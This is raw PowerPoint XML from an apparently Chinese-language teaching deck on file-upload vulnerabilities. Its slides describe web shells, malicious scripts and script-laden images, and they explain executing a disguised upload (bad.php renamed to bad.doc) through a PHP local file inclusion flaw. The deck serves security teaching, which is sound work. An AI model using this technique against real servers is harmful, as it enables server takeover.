                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C258D53-74CA-4C17-BC2E-79DF3F3EF432}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2324918" y="2752229"/>
                <a:ext cx="8208913"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3CD01B28-44EB-48F6-9B64-AE0C2EC1B7F1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5771761" y="2791207"/>
                <a:ext cx="4690059"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95581A21-EFC2-4A77-8B29-4DE218C663D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2684958"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en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>WebShell</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41" name="矩形 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D68878E7-484A-42E7-9F6C-6F66DB0B9C8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5843771" y="2830333"/>
              <a:ext cx="4032447"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攻击者可通过这些网页后门执行命令并控制服务器；</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44" name="组合 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BE844EB-63E2-4AD5-B938-829905C274AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="884237" y="2897413"/>
            <a:ext cx="8208914" cy="864096"/>
            <a:chOff x="2324918" y="2752229"/>
            <a:chExt cx="8208914" cy="864096"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="45" name="组合 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BBE74AC-0874-4738-BD6B-FA5737092EC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2324918" y="2752229"/>
              <a:ext cx="8208914" cy="864096"/>
              <a:chOff x="2324918" y="2752229"/>
              <a:chExt cx="8208914" cy="864096"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="矩形 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{630DA195-C554-4AAC-96BE-5F0BBC595EFF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2324918" y="2752229"/>
                <a:ext cx="8208914" cy="864096"/>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2699F45-7ABA-4737-A3C2-473CE6A39F27}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5771762" y="2791207"/>
                <a:ext cx="4690060" cy="7861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extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59BA63F2-17F2-4AC1-AEF8-AB25F8E422C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2459394"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其他恶意脚本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47" name="矩形 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D06A47B-A05E-47B3-9A09-132E3E70AD58}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5843771" y="2982690"/>
              <a:ext cx="4032447" cy="400110"/>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攻击者可直接执行脚本进行攻击；</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="组合 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F931F0-B853-4357-A393-D32A18FBB6E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3621137" y="3931171"/>
            <a:ext cx="8208914" cy="864096"/>
            <a:chOff x="2324918" y="2752229"/>
            <a:chExt cx="8208914" cy="864096"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="51" name="组合 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC34FB6D-0FAF-4AB4-83DB-D7D0A98E00F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2324918" y="2752229"/>
              <a:ext cx="8208914" cy="864096"/>
              <a:chOff x="2324918" y="2752229"/>
              <a:chExt cx="8208914" cy="864096"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="54" name="矩形 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48364743-AF1F-4DE6-B33D-8BC1FA48D0B2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2324918" y="2752229"/>
                <a:ext cx="8208914" cy="864096"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="1092F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E204B7C4-8BE1-4F5C-89F4-6A46FE41836B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5771761" y="2791207"/>
                <a:ext cx="4690061" cy="786139"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="1092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2" name="矩形 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7E5AAA0-8BF7-42E3-AC22-465AB2CD0755}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2669630" y="2984221"/>
              <a:ext cx="3312368" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>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恶意图片</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53" name="矩形 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB53B54C-0D67-40DA-83BA-8D052FDD90FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5843771" y="2830333"/>
              <a:ext cx="4690061" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>图片中可能包含了脚本，加载或者点击这些图片时脚本会悄无声息的执行；</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="56" name="组合 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E3CD4E7-FAE3-4130-B68A-78E7A1F526E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="884259" y="5051887"/>
            <a:ext cx="9702008" cy="1401395"/>
            <a:chOff x="2324918" y="2752228"/>
            <a:chExt cx="9702008" cy="1401395"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="57" name="组合 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A31D4A69-BE6F-42C9-9EC3-6A118EDBBF20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2324918" y="2752228"/>
              <a:ext cx="9702008" cy="1401395"/>
              <a:chOff x="2324918" y="2752228"/>
              <a:chExt cx="9702008" cy="1401395"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="60" name="矩形 59">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80831986-316B-4A37-93D8-88F4280649AF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2324918" y="2752228"/>
                <a:ext cx="9702008" cy="1401395"/>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29FF1D10-71F3-4154-8517-DD76D3211318}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5771761" y="2791207"/>
                <a:ext cx="6187960" cy="1323439"/>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8" name="矩形 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FF39D6B-6724-4CAA-B408-5D3A7E22E1C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2644184" y="3060005"/>
              <a:ext cx="2808312" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>上传文件是</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>伪装成正常后缀的恶意脚本</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>时</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="矩形 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A23D6C9-4AA3-4D20-9F08-7C924949B1AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5834501" y="2791205"/>
              <a:ext cx="6120755" cy="1323439"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>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攻击者可借助本地文件包含漏洞</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(Local File Include)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执行该文件。如将</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bad.php</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文件改名为</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bad.doc</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上传到服务器，再通过</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PHP</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的</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include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include_once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require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require_once</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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等函数包含执行。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347874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406213" y="1031709"/>
            <a:ext cx="7956884" cy="488847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06213" y="447572"/>
            <a:ext cx="363640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一个</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php</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文件上传代码如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="20" name="表格 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId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2949900162"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1460823" y="1096045"/>
          <a:ext cx="10153128" cy="5572802"/>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20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5328592">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上传文件的文件名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上传文件的类型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上传文件的大小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上传文件的临时存放路径 </a:t>
                      </a:r>
                    </a:p>
                    <a:p>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["error"];//</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上传后系统返回的值  </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN"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p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="20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021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3246</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>225</Paragraphs>
  <Slides>40</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2022-02-09T10:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>